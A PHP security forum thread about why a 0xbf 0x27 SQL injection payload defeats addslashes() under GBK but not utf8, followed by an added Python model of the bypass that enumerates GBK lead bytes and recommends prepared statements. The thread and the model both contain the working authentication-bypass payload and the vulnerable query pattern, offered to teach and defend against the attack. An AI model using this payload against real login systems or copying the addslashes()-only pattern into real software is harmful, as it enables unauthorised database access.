How is this code not secure ?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


goldensparrow
Forum Commoner
Posts: 30
Joined: Wed Jun 17, 2009 3:31 am

How is this code not secure ?

Post by goldensparrow »

I visited Chris's web site and saw his code:

<?php

$mysql = array();

/* SQL Injection Example: addslashes() is not aware of the connection charset */

/* Payload: a high byte (0xbf), then a single quote (0x27), then the injected SQL */
$_POST['username'] = chr(0xbf) .
                     chr(0x27) .
                     ' OR username = username /*';
$_POST['password'] = 'guess';

/* addslashes() turns 0xbf 0x27 into 0xbf 0x5c 0x27. Under a multi-byte charset
   such as GBK, 0xbf 0x5c is a single character, so the quote is left unescaped. */
$mysql['username'] = addslashes($_POST['username']);
$mysql['password'] = addslashes($_POST['password']);

$sql = "SELECT *
        FROM   users
        WHERE  username = '{$mysql['username']}'
        AND    password = '{$mysql['password']}'";

echo $sql;

?>
I tried to test that code and echo the $sql variable; it printed this:


SELECT * FROM users WHERE username = '¿\' OR username = username /*' AND password = 'guess'

I copied this SQL command and ran it in phpMyAdmin, but it returned 0 rows, so the attacker cannot access my database.
My question is: why did my database return 0 rows when I ran this code? Or can you describe what this code does?

Thanks in advance.
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: How is this code not secure ?

Post by kaisellgren »

The injection works just fine. addslashes() is not a multi-byte-safe function and has never been meant to be used to prevent SQL injections. I think any multi-byte character ending in 0x5c could be used to inject a single quote.

Maybe you do not have a users table with a username column, or MySQL was running in ANSI mode, where /* should be invalid, I think.
goldensparrow
Forum Commoner
Posts: 30
Joined: Wed Jun 17, 2009 3:31 am

Re: How is this code not secure ?

Post by goldensparrow »

Sorry Kai, the code you saw is wrong; my copy was missing something. Here is the actual code:

SELECT * FROM users WHERE username = '?\' OR username = username /*' AND password = 'guess'

The users table exists in my database and the charset is utf8.

It seems my database tried to search for username = "?\' OR username = username /*" and password = "guess", so it returned 0 rows.

What I want to know is: why can this SQL injection method not access my database?

Thanks, and sorry for the missing information.
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: How is this code not secure ?

Post by kaisellgren »

The code you pasted previously has a question mark (0x3f) and an escape character (0x5c). This will not bypass addslashes(). You need to use characters outside the ASCII range to achieve the results you want. In the first post you used 0xbf, which is not in the ASCII range and works well.
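Added example, not part of the original thread or of Chris Shiflett's code: a byte-level model of what kaisellgren describes in both replies, showing why the 0xbf 0x27 payload slips past addslashes() when the server interprets the bytes under a multi-byte charset such as GBK, why the very same bytes fail under utf8 (which is what goldensparrow saw: the quote stays escaped and the query returns 0 rows), and why a plain '?' (0x3f) can never work. The server-side string parsing here is a simplified model written for this example, not MySQL's lexer, and it assumes backslash escaping is enabled (the default, i.e. NO_BACKSLASH_ESCAPES off).

```python
"""Added example (not from the thread): why addslashes() is bypassable under a
multi-byte charset and not under UTF-8. Server-side parsing is a simplified model."""


def addslashes(data: bytes) -> bytes:
    """Byte-for-byte model of PHP's addslashes(): a backslash is put before
    ' " \\ and NUL. It knows nothing about the connection charset."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(username: bytes, password: bytes) -> bytes:
    """The query from the thread, with addslashes() as the only defence."""
    return (b"SELECT * FROM users WHERE username = '" + addslashes(username)
            + b"' AND password = '" + addslashes(password) + b"'")


def parse_literal(text: str, start: int) -> tuple[str, int]:
    """Read a single-quoted literal starting at text[start] == "'", honouring
    backslash escapes the way the server does AFTER decoding the charset.
    Returns (contents, index just past the closing quote)."""
    i = start + 1
    out = []
    while i < len(text):
        c = text[i]
        if c == "\\" and i + 1 < len(text):
            out.append(text[i + 1])      # escaped character, stays in the literal
            i += 2
        elif c == "'":
            return "".join(out), i + 1   # unescaped quote closes the literal
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def sql_after_username(query: bytes, charset: str) -> str:
    """Decode the query as a server using `charset` would, then return whatever
    follows the username literal. If the attacker's OR clause shows up here it
    is executed as SQL; if it stayed inside the literal the injection failed."""
    text = query.decode(charset, errors="replace")
    start = text.index("username = '") + len("username = ")
    _, end = parse_literal(text, start)
    return text[end:].strip()


def injection_works(username: bytes, charset: str) -> bool:
    """True when the injected ' OR username = username /*' escapes the literal."""
    return sql_after_username(build_query(username, b"guess"), charset).startswith("OR ")


def lead_bytes_that_swallow_backslash(charset: str) -> list[int]:
    """Every high byte that, followed by 0x5c, decodes as ONE character under
    `charset`. Each one turns the escaping backslash into the tail of a
    multi-byte character and leaves the following quote unescaped. This is the
    general form of the 0xbf trick from the thread."""
    hits = []
    for lead in range(0x80, 0x100):
        try:
            if len(bytes([lead, 0x5C]).decode(charset)) == 1:
                hits.append(lead)
        except UnicodeDecodeError:
            pass
    return hits


PAYLOAD = b"\xbf\x27 OR username = username /*"        # the thread's payload
ASCII_PAYLOAD = b"\x3f\x27 OR username = username /*"  # '?' (0x3f) instead of 0xbf

if __name__ == "__main__":
    for label, user, cs in [("0xbf under gbk", PAYLOAD, "gbk"),
                            ("0xbf under utf-8", PAYLOAD, "utf-8"),
                            ("0x3f under gbk", ASCII_PAYLOAD, "gbk")]:
        print(f"{label}: injection works = {injection_works(user, cs)}")
        print("   SQL after the username literal:",
              sql_after_username(build_query(user, b"guess"), cs))
    print("gbk lead bytes that swallow a backslash:",
          len(lead_bytes_that_swallow_backslash("gbk")))
```

Under gbk the bytes 0xbf 0x5c decode to a single character, so the 0x27 that follows is a bare quote and the rest of the payload becomes SQL. Under utf-8 the lone 0xbf is simply an invalid byte; the backslash still escapes the quote, the whole payload stays inside the string literal, and the query looks for a user literally named that, which is exactly the 0-row result from the phpMyAdmin test. The fix in PHP is the one the thread implies: never rely on addslashes(); use prepared statements, or at least mysqli_real_escape_string() with the connection charset set via mysqli_set_charset() rather than a SET NAMES query.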